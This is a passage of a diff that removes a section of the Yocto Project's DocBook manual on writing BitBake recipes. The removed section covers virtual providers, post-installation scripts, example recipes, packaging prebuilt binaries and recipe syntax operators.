-                <filename>virtual/kernel</filename> dependency based on the
-                <filename>PREFERRED_PROVIDER</filename> variable.
-                If you want to use the small kernel mentioned at the beginning
-                of this section, configure your build as follows:
-                <literallayout class='monospaced'>
-     PREFERRED_PROVIDER_virtual/kernel ??= "kernel-small"
-                </literallayout>
-                <note>
-                    Any recipe that
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PROVIDES'><filename>PROVIDES</filename></ulink>
-                    a <filename>virtual/*</filename> item that is ultimately
-                    not selected through
-                    <filename>PREFERRED_PROVIDER</filename> does not get built.
-                    Preventing these recipes from building is usually the
-                    desired behavior since this mechanism's purpose is to
-                    select between mutually exclusive alternative providers.
-                </note>
-            </para>
-
-            <para>
-                The following lists specific examples of virtual providers:
-                <itemizedlist>
-                    <listitem><para>
-                        <filename>virtual/kernel</filename>:
-                        Provides the name of the kernel recipe to use when
-                        building a kernel image.
-                        </para></listitem>
-                    <listitem><para>
-                        <filename>virtual/bootloader</filename>:
-                        Provides the name of the bootloader to use when
-                        building an image.
-                        </para></listitem>
-                    <listitem><para>
-                        <filename>virtual/mesa</filename>:
-                        Provides <filename>gbm.pc</filename>.
-                        </para></listitem>
-                    <listitem><para>
-                        <filename>virtual/egl</filename>:
-                        Provides <filename>egl.pc</filename> and possibly
-                        <filename>wayland-egl.pc</filename>.
-                        </para></listitem>
-                    <listitem><para>
-                        <filename>virtual/libgl</filename>:
-                        Provides <filename>gl.pc</filename> (i.e. libGL).
-                        </para></listitem>
-                    <listitem><para>
-                        <filename>virtual/libgles1</filename>:
-                        Provides <filename>glesv1_cm.pc</filename>
-                        (i.e. libGLESv1_CM).
-                        </para></listitem>
-                    <listitem><para>
-                        <filename>virtual/libgles2</filename>:
-                        Provides <filename>glesv2.pc</filename>
-                        (i.e. libGLESv2).
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='properly-versioning-pre-release-recipes'>
-            <title>Properly Versioning Pre-Release Recipes</title>
-
-            <para>
-                Sometimes the name of a recipe can lead to versioning
-                problems when the recipe is upgraded to a final release.
-                For example, consider the
-                <filename>irssi_0.8.16-rc1.bb</filename> recipe file in
-                the list of example recipes in the
-                "<link linkend='new-recipe-storing-and-naming-the-recipe'>Storing and Naming the Recipe</link>"
-                section.
-                This recipe is at a release candidate stage (i.e.
-                "rc1").
-                When the recipe is released, the recipe filename becomes
-                <filename>irssi_0.8.16.bb</filename>.
-                The version change from <filename>0.8.16-rc1</filename>
-                to <filename>0.8.16</filename> is seen as a decrease by the
-                build system and package managers, so the resulting packages
-                will not correctly trigger an upgrade.
-            </para>
-
-            <para>
-                In order to ensure the versions compare properly, the
-                recommended convention is to set
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-PV'><filename>PV</filename></ulink>
-                within the recipe to
-                "<replaceable>previous_version</replaceable>+<replaceable>current_version</replaceable>".
-                You can use an additional variable so that you can use the
-                current version elsewhere.
-                Here is an example:
-                <literallayout class='monospaced'>
-     REALPV = "0.8.16-rc1"
-     PV = "0.8.15+${REALPV}"
-                </literallayout>
-            </para>
-        </section>
-
-        <section id='new-recipe-post-installation-scripts'>
-            <title>Post-Installation Scripts</title>
-
-            <para>
-                Post-installation scripts run immediately after installing
-                a package on the target or during image creation when a
-                package is included in an image.
-                To add a post-installation script to a package, add a
-                <filename>pkg_postinst_</filename><replaceable>PACKAGENAME</replaceable><filename>()</filename> function to
-                the recipe file (<filename>.bb</filename>) and replace
-                <replaceable>PACKAGENAME</replaceable> with the name of the package
-                you want to attach to the <filename>postinst</filename>
-                script.
-                To apply the post-installation script to the main package
-                for the recipe, which is usually what is required, specify
-                <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-PN'><filename>PN</filename></ulink><filename>}</filename>
-                in place of <replaceable>PACKAGENAME</replaceable>.
-            </para>
-
-            <para>
-                A post-installation function has the following structure:
-                <literallayout class='monospaced'>
-     pkg_postinst_<replaceable>PACKAGENAME</replaceable>() {
-     # Commands to carry out
-     }
-                </literallayout>
-            </para>
-
-            <para>
-                The script defined in the post-installation function is
-                called when the root filesystem is created.
-                If the script succeeds, the package is marked as installed.
-                <note>
-                    Any RPM post-installation script that runs on the target
-                    should return a 0 exit code.
-                    RPM does not allow non-zero exit codes for these scripts,
-                    and the RPM package manager will cause the package to fail
-                    installation on the target.
-                </note>
-            </para>
-
-            <para>
-                Sometimes it is necessary for the execution of a
-                post-installation script to be delayed until the first boot.
-                For example, the script might need to be executed on the
-                device itself.
-                To delay script execution until boot time, you must explicitly
-                mark post installs to defer to the target.
-                You can use <filename>pkg_postinst_ontarget()</filename> or
-                call
-                <filename>postinst_intercept delay_to_first_boot</filename>
-                from <filename>pkg_postinst()</filename>.
-                Any failure of a <filename>pkg_postinst()</filename> script
-                (including exit 1) triggers an error during the
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-rootfs'><filename>do_rootfs</filename></ulink>
-                task.
-            </para>
-
-            <para>
-                If you have recipes that use
-                <filename>pkg_postinst</filename> function
-                and they require the use of non-standard native
-                tools that have dependencies during rootfs construction, you
-                need to use the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_WRITE_DEPS'><filename>PACKAGE_WRITE_DEPS</filename></ulink>
-                variable in your recipe to list these tools.
-                If you do not use this variable, the tools might be missing and
-                execution of the post-installation script is deferred until
-                first boot.
-                Deferring the script to first boot is undesirable and for
-                read-only rootfs impossible.
-            </para>
-
-            <note>
-                Equivalent support for pre-install, pre-uninstall, and
-                post-uninstall scripts exist by way of
-                <filename>pkg_preinst</filename>,
-                <filename>pkg_prerm</filename>, and
-                <filename>pkg_postrm</filename>, respectively.
-                These scrips work in exactly the same way as does
-                <filename>pkg_postinst</filename> with the exception
-                that they run at different times.
-                Also, because of when they run, they are not applicable to
-                being run at image creation time like
-                <filename>pkg_postinst</filename>.
-            </note>
-        </section>
-
-        <section id='new-recipe-testing'>
-            <title>Testing</title>
-
-            <para>
-                The final step for completing your recipe is to be sure that
-                the software you built runs correctly.
-                To accomplish runtime testing, add the build's output
-                packages to your image and test them on the target.
-            </para>
-
-            <para>
-                For information on how to customize your image by adding
-                specific packages, see the
-                "<link linkend='usingpoky-extend-customimage'>Customizing Images</link>"
-                section.
-            </para>
-        </section>
-
-        <section id='new-recipe-testing-examples'>
-            <title>Examples</title>
-
-            <para>
-                To help summarize how to write a recipe, this section provides
-                some examples given various scenarios:
-                <itemizedlist>
-                    <listitem><para>Recipes that use local files</para></listitem>
-                    <listitem><para>Using an Autotooled package</para></listitem>
-                    <listitem><para>Using a Makefile-based package</para></listitem>
-                    <listitem><para>Splitting an application into multiple packages</para></listitem>
-                    <listitem><para>Adding binaries to an image</para></listitem>
-                </itemizedlist>
-            </para>
-
-            <section id='new-recipe-single-c-file-package-hello-world'>
-                <title>Single .c File Package (Hello World!)</title>
-
-                <para>
-                    Building an application from a single file that is stored
-                    locally (e.g. under <filename>files</filename>) requires
-                    a recipe that has the file listed in the
-                    <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'>SRC_URI</ulink></filename>
-                    variable.
-                    Additionally, you need to manually write the
-                    <filename>do_compile</filename> and
-                    <filename>do_install</filename> tasks.
-                    The <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-S'>S</ulink></filename>
-                    variable defines the directory containing the source code,
-                    which is set to
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink>
-                    in this case - the directory BitBake uses for the build.
-                    <literallayout class='monospaced'>
-     SUMMARY = "Simple helloworld application"
-     SECTION = "examples"
-     LICENSE = "MIT"
-     LIC_FILES_CHKSUM = "file://${COMMON_LICENSE_DIR}/MIT;md5=0835ade698e0bcf8506ecda2f7b4f302"
-
-     SRC_URI = "file://helloworld.c"
-
-     S = "${WORKDIR}"
-
-     do_compile() {
-     	${CC} helloworld.c -o helloworld
-     }
-
-     do_install() {
-     	install -d ${D}${bindir}
-     	install -m 0755 helloworld ${D}${bindir}
-     }
-                    </literallayout>
-                </para>
-
-                <para>
-                    By default, the <filename>helloworld</filename>,
-                    <filename>helloworld-dbg</filename>, and
-                    <filename>helloworld-dev</filename> packages are built.
-                    For information on how to customize the packaging process,
-                    see the
-                    "<link linkend='splitting-an-application-into-multiple-packages'>Splitting an Application into Multiple Packages</link>"
-                    section.
-                </para>
-            </section>
-
-            <section id='new-recipe-autotooled-package'>
-                <title>Autotooled Package</title>
-                <para>
-                    Applications that use Autotools such as <filename>autoconf</filename> and
-                    <filename>automake</filename> require a recipe that has a source archive listed in
-                    <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'>SRC_URI</ulink></filename> and
-                    also inherit the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-autotools'><filename>autotools</filename></ulink>
-                    class, which contains the definitions of all the steps
-                    needed to build an Autotool-based application.
-                    The result of the build is automatically packaged.
-                    And, if the application uses NLS for localization, packages with local information are
-                    generated (one package per language).
-                    Following is one example: (<filename>hello_2.3.bb</filename>)
-                    <literallayout class='monospaced'>
-     SUMMARY = "GNU Helloworld application"
-     SECTION = "examples"
-     LICENSE = "GPLv2+"
-     LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe"
-
-     SRC_URI = "${GNU_MIRROR}/hello/hello-${PV}.tar.gz"
-
-     inherit autotools gettext
-                     </literallayout>
-                </para>
-
-                <para>
-                    The variable
-                    <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-LIC_FILES_CHKSUM'>LIC_FILES_CHKSUM</ulink></filename>
-                    is used to track source license changes as described in the
-                    "<link linkend='usingpoky-configuring-LIC_FILES_CHKSUM'>Tracking License Changes</link>"
-                    section in the Yocto Project Overview and Concepts Manual.
-                    You can quickly create Autotool-based recipes in a manner
-                    similar to the previous example.
-                </para>
-            </section>
-
-            <section id='new-recipe-makefile-based-package'>
-                <title>Makefile-Based Package</title>
-
-                <para>
-                    Applications that use GNU <filename>make</filename> also require a recipe that has
-                    the source archive listed in
-                    <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'>SRC_URI</ulink></filename>.
-                    You do not need to add a <filename>do_compile</filename> step since by default BitBake
-                    starts the <filename>make</filename> command to compile the application.
-                    If you need additional <filename>make</filename> options, you should store them in the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTRA_OEMAKE'><filename>EXTRA_OEMAKE</filename></ulink>
-                    or
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGECONFIG_CONFARGS'><filename>PACKAGECONFIG_CONFARGS</filename></ulink>
-                    variables.
-                    BitBake passes these options into the GNU <filename>make</filename> invocation.
-                    Note that a <filename>do_install</filename> task is still required.
-                    Otherwise, BitBake runs an empty <filename>do_install</filename> task by default.
-                </para>
-
-               <para>
-                    Some applications might require extra parameters to be passed to the compiler.
-                    For example, the application might need an additional header path.
-                    You can accomplish this by adding to the
-                    <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-CFLAGS'>CFLAGS</ulink></filename> variable.
-                    The following example shows this:
-                    <literallayout class='monospaced'>
-     CFLAGS_prepend = "-I ${S}/include "
-                    </literallayout>
-                </para>
-
-                <para>
-                In the following example, <filename>mtd-utils</filename> is a makefile-based package:
-                    <literallayout class='monospaced'>
-     SUMMARY = "Tools for managing memory technology devices"
-     SECTION = "base"
-     DEPENDS = "zlib lzo e2fsprogs util-linux"
-     HOMEPAGE = "http://www.linux-mtd.infradead.org/"
-     LICENSE = "GPLv2+"
-     LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3 \
-                         file://include/common.h;beginline=1;endline=17;md5=ba05b07912a44ea2bf81ce409380049c"
-
-     # Use the latest version at 26 Oct, 2013
-     SRCREV = "9f107132a6a073cce37434ca9cda6917dd8d866b"
-     SRC_URI = "git://git.infradead.org/mtd-utils.git \
-                     file://add-exclusion-to-mkfs-jffs2-git-2.patch \
-     "
-
-     PV = "1.5.1+git${SRCPV}"
-
-     S = "${WORKDIR}/git"
-
-     EXTRA_OEMAKE = "'CC=${CC}' 'RANLIB=${RANLIB}' 'AR=${AR}' 'CFLAGS=${CFLAGS} -I${S}/include -DWITHOUT_XATTR' 'BUILDDIR=${S}'"
-
-     do_install () {
-             oe_runmake install DESTDIR=${D} SBINDIR=${sbindir} MANDIR=${mandir} INCLUDEDIR=${includedir}
-     }
-
-     PACKAGES =+ "mtd-utils-jffs2 mtd-utils-ubifs mtd-utils-misc"
-
-     FILES_mtd-utils-jffs2 = "${sbindir}/mkfs.jffs2 ${sbindir}/jffs2dump ${sbindir}/jffs2reader ${sbindir}/sumtool"
-     FILES_mtd-utils-ubifs = "${sbindir}/mkfs.ubifs ${sbindir}/ubi*"
-     FILES_mtd-utils-misc = "${sbindir}/nftl* ${sbindir}/ftl* ${sbindir}/rfd* ${sbindir}/doc* ${sbindir}/serve_image ${sbindir}/recv_image"
-
-     PARALLEL_MAKE = ""
-
-     BBCLASSEXTEND = "native"
-                    </literallayout>
-                </para>
-            </section>
-
-            <section id='splitting-an-application-into-multiple-packages'>
-                <title>Splitting an Application into Multiple Packages</title>
-
-                <para>
-                    You can use the variables
-                    <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGES'>PACKAGES</ulink></filename> and
-                    <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-FILES'>FILES</ulink></filename>
-                    to split an application into multiple packages.
-                </para>
-
-                <para>
-                    Following is an example that uses the <filename>libxpm</filename> recipe.
-                    By default, this recipe generates a single package that contains the library along
-                    with a few binaries.
-                    You can modify the recipe to split the binaries into separate packages:
-                    <literallayout class='monospaced'>
-     require xorg-lib-common.inc
-
-     SUMMARY = "Xpm: X Pixmap extension library"
-     LICENSE = "BSD"
-     LIC_FILES_CHKSUM = "file://COPYING;md5=51f4270b012ecd4ab1a164f5f4ed6cf7"
-     DEPENDS += "libxext libsm libxt"
-     PE = "1"
-
-     XORG_PN = "libXpm"
-
-     PACKAGES =+ "sxpm cxpm"
-     FILES_cxpm = "${bindir}/cxpm"
-     FILES_sxpm = "${bindir}/sxpm"
-                    </literallayout>
-                </para>
-
-                <para>
-                    In the previous example, we want to ship the <filename>sxpm</filename>
-                    and <filename>cxpm</filename> binaries in separate packages.
-                    Since <filename>bindir</filename> would be packaged into the main
-                    <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-PN'>PN</ulink></filename>
-                    package by default, we prepend the <filename>PACKAGES</filename>
-                    variable so additional package names are added to the start of list.
-                    This results in the extra <filename>FILES_*</filename>
-                    variables then containing information that define which files and
-                    directories go into which packages.
-                    Files included by earlier packages are skipped by latter packages.
-                    Thus, the main <filename>PN</filename> package
-                    does not include the above listed files.
-                </para>
-            </section>
-
-            <section id='packaging-externally-produced-binaries'>
-                <title>Packaging Externally Produced Binaries</title>
-
-                <para>
-                    Sometimes, you need to add pre-compiled binaries to an
-                    image.
-                    For example, suppose that binaries for proprietary code
-                    exist, which are created by a particular division of a
-                    company.
-                    Your part of the company needs to use those binaries as
-                    part of an image that you are building using the
-                    OpenEmbedded build system.
-                    Since you only have the binaries and not the source code,
-                    you cannot use a typical recipe that expects to fetch the
-                    source specified in
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
-                    and then compile it.
-                </para>
-
-                <para>
-                    One method is to package the binaries and then install them
-                    as part of the image.
-                    Generally, it is not a good idea to package binaries
-                    since, among other things, it can hinder the ability to
-                    reproduce builds and could lead to compatibility problems
-                    with ABI in the future.
-                    However, sometimes you have no choice.
-                </para>
-
-                <para>
-                    The easiest solution is to create a recipe that uses
-                    the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-bin-package'><filename>bin_package</filename></ulink>
-                    class and to be sure that you are using default locations
-                    for build artifacts.
-                    In most cases, the <filename>bin_package</filename> class
-                    handles "skipping" the configure and compile steps as well
-                    as sets things up to grab packages from the appropriate
-                    area.
-                    In particular, this class sets <filename>noexec</filename>
-                    on both the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-configure'><filename>do_configure</filename></ulink>
-                    and
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-compile'><filename>do_compile</filename></ulink>
-                    tasks, sets
-                    <filename>FILES_${PN}</filename> to "/" so that it picks
-                    up all files, and sets up a
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-install'><filename>do_install</filename></ulink>
-                    task, which effectively copies all files from
-                    <filename>${S}</filename> to <filename>${D}</filename>.
-                    The <filename>bin_package</filename> class works well when
-                    the files extracted into <filename>${S}</filename> are
-                    already laid out in the way they should be laid out
-                    on the target.
-                    For more information on these variables, see the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-FILES'><filename>FILES</filename></ulink>,
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PN'><filename>PN</filename></ulink>,
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-S'><filename>S</filename></ulink>,
-                    and
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-D'><filename>D</filename></ulink>
-                    variables in the Yocto Project Reference Manual's variable
-                    glossary.
-                    <note><title>Notes</title>
-                        <itemizedlist>
-                            <listitem><para>
-                                Using
-                                <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPENDS'><filename>DEPENDS</filename></ulink>
-                                is a good idea even for components distributed
-                                in binary form, and is often necessary for
-                                shared libraries.
-                                For a shared library, listing the library
-                                dependencies in
-                                <filename>DEPENDS</filename> makes sure that
-                                the libraries are available in the staging
-                                sysroot when other recipes link against the
-                                library, which might be necessary for
-                                successful linking.
-                                </para></listitem>
-                            <listitem><para>
-                                Using <filename>DEPENDS</filename> also
-                                allows runtime dependencies between packages
-                                to be added automatically.
-                                See the
-                                "<ulink url='&YOCTO_DOCS_OM_URL;#automatically-added-runtime-dependencies'>Automatically Added Runtime Dependencies</ulink>"
-                                section in the Yocto Project Overview and
-                                Concepts Manual for more information.
-                                </para></listitem>
-                        </itemizedlist>
-                    </note>
-                </para>
-
-                <para>
-                    If you cannot use the <filename>bin_package</filename>
-                    class, you need to be sure you are doing the following:
-                    <itemizedlist>
-                        <listitem><para>
-                            Create a recipe where the
-                            <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-configure'><filename>do_configure</filename></ulink>
-                            and
-                            <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-compile'><filename>do_compile</filename></ulink>
-                            tasks do nothing:
-                            It is usually sufficient to just not define these
-                            tasks in the recipe, because the default
-                            implementations do nothing unless a Makefile is
-                            found in
-                            <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-S'><filename>S</filename></ulink><filename>}</filename>.
-                            </para>
-
-                            <para>If
-                            <filename>${S}</filename> might contain a Makefile,
-                            or if you inherit some class that replaces
-                            <filename>do_configure</filename> and
-                            <filename>do_compile</filename> with custom
-                            versions, then you can use the
-                            <filename>[</filename><ulink url='&YOCTO_DOCS_BB_URL;#variable-flags'><filename>noexec</filename></ulink><filename>]</filename>
-                            flag to turn the tasks into no-ops, as follows:
-                            <literallayout class='monospaced'>
-     do_configure[noexec] = "1"
-     do_compile[noexec] = "1"
-                            </literallayout>
-                            Unlike
-                            <ulink url='&YOCTO_DOCS_BB_URL;#deleting-a-task'><filename>deleting the tasks</filename></ulink>,
-                            using the flag preserves the dependency chain from
-                            the
-                            <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-fetch'><filename>do_fetch</filename></ulink>,                     <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-unpack'><filename>do_unpack</filename></ulink>,
-                            and
-                            <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-patch'><filename>do_patch</filename></ulink>
-                            tasks to the
-                            <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-install'><filename>do_install</filename></ulink>
-                            task.
-                            </para></listitem>
-                        <listitem><para>Make sure your
-                            <filename>do_install</filename> task installs the
-                            binaries appropriately.
-                            </para></listitem>
-                        <listitem><para>Ensure that you set up
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-FILES'><filename>FILES</filename></ulink>
-                            (usually
-                            <filename>FILES_${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-PN'><filename>PN</filename></ulink><filename>}</filename>)
-                            to point to the files you have installed, which of
-                            course depends on where you have installed them
-                            and whether those files are in different locations
-                            than the defaults.
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-            </section>
-        </section>
-
-        <section id="following-recipe-style-guidelines">
-            <title>Following Recipe Style Guidelines</title>
-
-            <para>
-                When writing recipes, it is good to conform to existing
-                style guidelines.
-                The
-                <ulink url='http://www.openembedded.org/wiki/Styleguide'>OpenEmbedded Styleguide</ulink>
-                wiki page provides rough guidelines for preferred recipe style.
-            </para>
-
-            <para>
-                It is common for existing recipes to deviate a bit from this
-                style.
-                However, aiming for at least a consistent style is a good idea.
-                Some practices, such as omitting spaces around
-                <filename>=</filename> operators in assignments or ordering
-                recipe components in an erratic way, are widely seen as poor
-                style.
-            </para>
-        </section>
-
-        <section id='recipe-syntax'>
-            <title>Recipe Syntax</title>
-
-            <para>
-                Understanding recipe file syntax is important for writing
-                recipes.
-                The following list overviews the basic items that make up a
-                BitBake recipe file.
-                For more complete BitBake syntax descriptions, see the
-                "<ulink url='&YOCTO_DOCS_BB_URL;#bitbake-user-manual-metadata'>Syntax and Operators</ulink>"
-                chapter of the BitBake User Manual.
-                <itemizedlist>
-                    <listitem><para>
-                        <emphasis>Variable Assignments and Manipulations:</emphasis>
-                        Variable assignments allow a value to be assigned to a
-                        variable.
-                        The assignment can be static text or might include
-                        the contents of other variables.
-                        In addition to the assignment, appending and prepending
-                        operations are also supported.</para>
-
-                        <para>The following example shows some of the ways
-                        you can use variables in recipes:
-                        <literallayout class='monospaced'>
-     S = "${WORKDIR}/postfix-${PV}"
-     CFLAGS += "-DNO_ASM"
-     SRC_URI_append = " file://fixup.patch"
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Functions:</emphasis>
-                        Functions provide a series of actions to be performed.
-                        You usually use functions to override the default
-                        implementation of a task function or to complement
-                        a default function (i.e. append or prepend to an
-                        existing function).
-                        Standard functions use <filename>sh</filename> shell
-                        syntax, although access to OpenEmbedded variables and
-                        internal methods are also available.</para>
-
-                        <para>The following is an example function from the
-                        <filename>sed</filename> recipe:
-                        <literallayout class='monospaced'>
-     do_install () {
-         autotools_do_install
-         install -d ${D}${base_bindir}
-         mv ${D}${bindir}/sed ${D}${base_bindir}/sed
-         rmdir ${D}${bindir}/
-     }
-                        </literallayout>
-                        It is also possible to implement new functions that
-                        are called between existing tasks as long as the
-                        new functions are not replacing or complementing the
-                        default functions.
-                        You can implement functions in Python
-                        instead of shell.
-                        Both of these options are not seen in the majority of
-                        recipes.
-                        </para></listitem>
-                    <listitem><para><emphasis>Keywords:</emphasis>
-                        BitBake recipes use only a few keywords.
-                        You use keywords to include common
-                        functions (<filename>inherit</filename>), load parts
-                        of a recipe from other files
-                        (<filename>include</filename> and
-                        <filename>require</filename>) and export variables
-                        to the environment (<filename>export</filename>).
-                        </para>
-
-                        <para>The following example shows the use of some of
-                        these keywords:
-                        <literallayout class='monospaced'>
-     export POSTCONF = "${STAGING_BINDIR}/postconf"
-     inherit autoconf
-     require otherfile.inc
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Comments (#):</emphasis>
-                        Any lines that begin with the hash character
-                        (<filename>#</filename>) are treated as comment lines
-                        and are ignored:
-                        <literallayout class='monospaced'>
-     # This is a comment
-                        </literallayout>
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                This next list summarizes the most important and most commonly
-                used parts of the recipe syntax.
-                For more information on these parts of the syntax, you can
-                reference the
-                <ulink url='&YOCTO_DOCS_BB_URL;#bitbake-user-manual-metadata'>Syntax and Operators</ulink>
-                chapter in the BitBake User Manual.
-                <itemizedlist>
-                    <listitem><para>
-                        <emphasis>Line Continuation (\):</emphasis>
-                        Use the backward slash (<filename>\</filename>)
-                        character to split a statement over multiple lines.
-                        Place the slash character at the end of the line that
-                        is to be continued on the next line:
-                        <literallayout class='monospaced'>
-     VAR = "A really long \
-            line"
-                        </literallayout>
-                        <note>
-                            You cannot have any characters including spaces
-                            or tabs after the slash character.
-                        </note>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Using Variables (${<replaceable>VARNAME</replaceable>}):</emphasis>
-                        Use the <filename>${<replaceable>VARNAME</replaceable>}</filename>
-                        syntax to access the contents of a variable:
-                        <literallayout class='monospaced'>
-     SRC_URI = "${SOURCEFORGE_MIRROR}/libpng/zlib-${PV}.tar.gz"
-                        </literallayout>
-                        <note>
-                            It is important to understand that the value of a
-                            variable expressed in this form does not get
-                            substituted automatically.
-                            The expansion of these expressions happens
-                            on-demand later (e.g. usually when a function that
-                            makes reference to the variable executes).
-                            This behavior ensures that the values are most
-                            appropriate for the context in which they are
-                            finally used.
-                            On the rare occasion that you do need the variable
-                            expression to be expanded immediately, you can use
-                            the <filename>:=</filename> operator instead of
-                            <filename>=</filename> when you make the
-                            assignment, but this is not generally needed.
-                        </note>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Quote All Assignments ("<replaceable>value</replaceable>"):</emphasis>
-                        Use double quotes around values in all variable
-                        assignments (e.g.
-                        <filename>"<replaceable>value</replaceable>"</filename>).
-                        Following is an example:
-                        <literallayout class='monospaced'>
-     VAR1 = "${OTHERVAR}"
-     VAR2 = "The version is ${PV}"
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Conditional Assignment (?=):</emphasis>
-                        Conditional assignment is used to assign a
-                        value to a variable, but only when the variable is
-                        currently unset.
-                        Use the question mark followed by the equal sign
-                        (<filename>?=</filename>) to make a "soft" assignment
-                        used for conditional assignment.
-                        Typically, "soft" assignments are used in the
-                        <filename>local.conf</filename> file for variables
-                        that are allowed to come through from the external
-                        environment.
-                        </para>
-
-                        <para>Here is an example where
-                        <filename>VAR1</filename> is set to "New value" if
-                        it is currently empty.
-                        However, if <filename>VAR1</filename> has already been
-                        set, it remains unchanged:
-                        <literallayout class='monospaced'>
-     VAR1 ?= "New value"
-                        </literallayout>
-                        In this next example, <filename>VAR1</filename>
-                        is left with the value "Original value":
-                        <literallayout class='monospaced'>
-     VAR1 = "Original value"
-     VAR1 ?= "New value"
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Appending (+=):</emphasis>
-                        Use the plus character followed by the equals sign
-                        (<filename>+=</filename>) to append values to existing
-                        variables.
-                        <note>
-                            This operator adds a space between the existing
-                            content of the variable and the new content.
-                        </note></para>
-
-                        <para>Here is an example:
-                        <literallayout class='monospaced'>
-     SRC_URI += "file://fix-makefile.patch"
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Prepending (=+):</emphasis>
-                        Use the equals sign followed by the plus character
-                        (<filename>=+</filename>) to prepend values to existing
-                        variables.
-                        <note>
-                            This operator adds a space between the new content
-                            and the existing content of the variable.
-                        </note></para>
-
-                        <para>Here is an example:
-                        <literallayout class='monospaced'>
-     VAR =+ "Starts"
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Appending (_append):</emphasis>
-                        Use the <filename>_append</filename> operator to
-                        append values to existing variables.
-                        This operator does not add any additional space.
-                        Also, the operator is applied after all the
-                        <filename>+=</filename>, and
-                        <filename>=+</filename> operators have been applied and
-                        after all <filename>=</filename> assignments have
-                        occurred.
-                        </para>
-
-                        <para>The following example shows the space being
-                        explicitly added to the start to ensure the appended
-                        value is not merged with the existing value:
-                        <literallayout class='monospaced'>
-     SRC_URI_append = " file://fix-makefile.patch"
-                        </literallayout>
-                        You can also use the <filename>_append</filename>
-                        operator with overrides, which results in the actions
-                        only being performed for the specified target or
-                        machine:
-                        <literallayout class='monospaced'>
-     SRC_URI_append_sh4 = " file://fix-makefile.patch"
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Prepending (_prepend):</emphasis>
-                        Use the <filename>_prepend</filename> operator to
-                        prepend values to existing variables.
-                        This operator does not add any additional space.
-                        Also, the operator is applied after all the
-                        <filename>+=</filename>, and
-                        <filename>=+</filename> operators have been applied and
-                        after all <filename>=</filename> assignments have
-                        occurred.
-                        </para>
-
-                        <para>The following example shows the space being
-                        explicitly added to the end to ensure the prepended
-                        value is not merged with the existing value:
-                        <literallayout class='monospaced'>
-     CFLAGS_prepend = "-I${S}/myincludes "
-                        </literallayout>
-                        You can also use the <filename>_prepend</filename>
-                        operator with overrides, which results in the actions
-                        only being performed for the specified target or
-                        machine:
-                        <literallayout class='monospaced'>
-     CFLAGS_prepend_sh4 = "-I${S}/myincludes "
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Overrides:</emphasis>
-                        You can use overrides to set a value conditionally,
-                        typically based on how the recipe is being built.
-                        For example, to set the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-KBRANCH'><filename>KBRANCH</filename></ulink>
-                        variable's value to "standard/base" for any target
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>,
-                        except for qemuarm where it should be set to
-                        "standard/arm-versatile-926ejs", you would do the
-                        following:
-                        <literallayout class='monospaced'>
-     KBRANCH = "standard/base"
-     KBRANCH_qemuarm  = "standard/arm-versatile-926ejs"
-                        </literallayout>
-                        Overrides are also used to separate alternate values
-                        of a variable in other situations.
-                        For example, when setting variables such as
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-FILES'><filename>FILES</filename></ulink>
-                        and
